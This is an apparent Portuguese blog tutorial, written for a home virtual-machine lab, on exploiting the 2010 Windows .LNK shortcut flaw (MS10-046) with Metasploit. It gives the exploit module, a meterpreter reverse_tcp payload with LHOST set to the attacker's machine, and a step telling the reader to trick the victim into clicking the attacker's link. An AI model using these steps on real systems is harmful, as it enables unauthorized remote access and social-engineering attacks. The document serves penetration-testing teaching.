Metasploit Framework é uma ferramenta fantástica, usada para fazer auditoria e testes de penetração etc, onde possue um grande framework de exploits para várias aplicações de diversos tipos! Nesse tutorial, mostrei uma falha que afeta todas as versões do windows que se diz respeito a manipulação de arquivos “.LNK“, esta falha, como o exploit, tornaram público em Julho de 2010. O mais interessante é que depois de descoberto a falha, a Microsoft só foi lançar uma correção 1 mês depois, deixando assim milhares de máquinas vulneváveis. No meu computador, utilizo máquinas virtuais para testes de penetração, onde assim não prejudico ninguem da minha rede e nem a mim mesmo, pois uma invasão sem autorização é crime, fique ligado Pois bem, aqui utilizo 2 máquinas virtuais. Windows XP (sem SP) com o IP: 192.168.1.142 BackTrack R1 (Já tem o R2 pra download) com o IP: 192.168.1.183 Estou utilizando a máquina virtual “Vmware Workstation 7“. Caso não conheça a VMware, use o google e conheçerá. Antes de tudo, vamos atualizar o Metasploit, então na shell digitamos: root@bt:~# cd /pentest/exploits/framework3 e no diretório do MSF, usamos o comando “svn update” para atualiza-ló. Ps: Para atualiza-ló, você tem que está no diretório do MSF3 Depois de atualizado, vamos inicialo pelo comando: root@bt:/pentest/exploits/framework3# msfconsole Agora vamos selecionar o exploit que iremos utilizar. Utilizo o comando “Search” para pesquisar o exploit, ou payload etc. Agora vamos utilizar o exploit pelo comando “use” e o caminho onde se encontra o mesmo. msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader Depois de selecionado o exploit, exprerimente utilizar o comando “info“.O mesmo apresenta informações detalhadas sobre o exploit e falha. Depois de setamos o exploit, vamos selecionar o payload. Usarei o Payload meterpreter. msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp Agora vamos seguir a seguinte configuração do exploit: set LHOST 192.168.1.183 = Meu ip exploit = Para lançar o exploit. Agora vamos usar a nossa engenharia social e pedir pra vitima clicar no link “http://192.168.1.183/”. Para entrar na sessão 1, vamos usar o comando “sessions -i 1“ Game over Já estamos dentro do computador alvo, para provar isso, digite o comando “sysinfo“, onde ele irá mostrar algumas informações básicas da nossa vítima.Requisitos
Iniciando
PAYLOAD => windows/meterpreter/reverse_tcp
Agora no BackTrack vamos digitar o comando “sessions -r“, esse comando lista todas as sessões ativas no momento ou não.
0 comentários:
Postar um comentário